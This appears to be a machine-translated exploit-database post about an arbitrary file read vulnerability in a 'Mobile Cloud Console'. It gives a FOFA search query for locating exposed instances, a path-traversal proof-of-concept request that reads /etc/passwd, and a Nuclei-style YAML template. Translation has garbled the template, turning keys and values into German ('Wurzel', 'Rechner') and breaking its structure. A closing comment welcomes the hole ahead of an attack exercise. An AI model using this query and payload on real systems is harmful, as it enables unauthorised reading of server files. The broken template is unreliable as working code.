Sicherheitslücke beim Lesen beliebiger Dateien in der Mobile Cloud-Konsole

expdb Anwendungssicherheit 3465

Mobile Cloud Console ist ein System, mit dem mobile Cloud-Produkte und -Dienste auf einheitliche Weise angezeigt und verwaltet werden können. In der Mobile Cloud Console gibt es eine Sicherheitslücke beim Lesen beliebiger Dateien, die von unbefugten Angreifern ausgenutzt werden kann, um sensible Informationen wie Website-Konfigurationsdateien zu lesen.

fofa

 

body="op-login-static/favicon.ico" || header="/oauth2/code/opgateway"

poc

 

GET /api/query/helpcenter/api/v2/preview?fileName=... /... /... /... /... /... /... /... /etc/passwd HTTP/1.1
Rechner: ip

image-20240602201314531

Yaml

 

id: cmecloud-Konsole-Lesedatei

Info: Name: cmecloud-Konsole-Lesedatei
  Name: cmecloud-Konsole-Lesedatei
  Autor: onewin
  Schweregrad: hoch
  description: Mobile Cloud Console existiert zum Lesen beliebiger Dateien

http.
- raw.
  - |+
    @Zeitüberschreitung: 30s
    GET /api/query/helpcenter/api/v2/preview?fileName=... /... /... /... /... /... /... /... /etc/passwd HTTP/1.1
    Host: {{Hostname}}

  Matcher-Bedingung: und
  Übereinstimmungen: {{Hostname}}
      - Typ: Status
        status: {{Hostname}} matchers-Bedingung: und matchers: Typ: status
          - 200
      - Typ: Wort
        Wörter.
          - "Wurzel"
        Teil: Körper

Kommentare

1 Kommentare Kommentar hinzufügen
  • Sicherheitschef
    Sicherheitschef
    Verantwortlicher für die Sicherheit (cncso.com)
    Antwort

    Die aktuelle Antwort wird als die beste angenommen

    HVV Gleich geht's los, und hier kommt das Schlupfloch. :)

    6 vor Monaten Keine Kommentare